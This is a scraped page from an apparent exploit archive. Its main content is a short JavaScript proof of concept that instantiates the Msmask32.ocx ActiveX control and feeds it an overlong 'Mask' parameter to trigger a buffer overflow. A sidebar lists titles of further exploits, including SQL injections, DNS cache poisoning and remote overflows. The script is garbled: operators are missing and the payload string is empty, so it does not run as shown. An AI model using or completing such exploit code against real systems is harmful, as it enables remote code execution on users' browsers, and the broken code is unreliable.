var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';var body1='"></OBJECT>';var buf='';for (i=1;i<=1945;i ){buf=buf unescape("");}document.write(body buf body1);


常见问题
相关文章
猜你喜欢
- BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py) 2022-12-07
- IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit 2022-12-07
- Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit 2022-12-07
- MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC 2022-12-07
- IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit 2022-12-07
- IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit 2022-12-07
- Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit 2022-12-07